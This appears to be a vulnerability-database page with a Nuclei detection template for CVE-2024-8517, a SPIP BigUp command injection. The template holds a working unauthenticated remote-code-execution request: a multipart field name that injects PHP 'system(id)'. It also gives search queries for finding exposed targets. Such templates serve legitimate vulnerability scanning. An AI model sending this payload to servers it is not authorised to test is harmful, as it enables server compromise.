| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution Exploit | 14 Sep 202400:00 | – | zdt | |
| Exploit for Reliance on File Name or Extension of Externally-Supplied File in Spip | 1 Aug 202511:14 | – | githubexploit | |
| eCPPT-Penetration-Testing-Reports | 3 Jun 202600:02 | – | githubexploit | |
| Exploit for Reliance on File Name or Extension of Externally-Supplied File in Spip | 6 Sep 202418:17 | – | githubexploit | |
| March Linux Patch Wednesday | 20 Mar 202520:49 | – | avleonov | |
| CVE-2024-8517 | 6 Sep 202419:06 | – | circl | |
| SPIP 安全漏洞 | 6 Sep 202400:00 | – | cnnvd | |
| CVE-2024-8517 | 6 Sep 202415:55 | – | cve | |
| CVE-2024-8517 SPIP Bigup Multipart File Upload OS Command Injection | 6 Sep 202415:55 | – | cvelist | |
| CVE-2024-8517 | 6 Sep 202415:55 | – | debiancve |
id: CVE-2024-8517
info:
name: SPIP BigUp Plugin - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands through crafted multipart file upload requests, achieving complete server compromise and full control of the SPIP installation.
remediation: |
Update SPIP to version 4.3.2, 4.2.16, or 4.1.18 or later to address the command injection vulnerability in the BigUp plugin.
reference:
- https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
- https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
- https://vulncheck.com/advisories/spip-upload-rce
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8517
cwe-id: CWE-646
epss-score: 0.94618
epss-percentile: 0.99845
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-1224668706
fofa-query: "X-Spip-Cache"
tags: cve,cve2024,intrusive,spip,rce,vuln
flow: http(1) && http(2)
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'formulaire_action_args'
- 'spip'
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: formulaire
regex:
- name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
internal: true
- raw:
- |
POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="page"
spip_pass
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="lang"
fr
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action"
oubli
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_args"
{{formulaire}}
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_sign"
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="oubli"
{{email}}
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="nobot"
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="bigup_retrouver_fichiers"
a
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
Content-Type: text/plain
{{string}}
--5f02b65945d644d6a32847ab130e9586--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4a0a0047304502207e89ad528a0c073323c528bbac7d3408978b4b1db18834318eb29cd8d63b7686022100a2c413d47efe761c88e53fac635208fff75cb60b47268562acfa0b1d31b3eb2c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation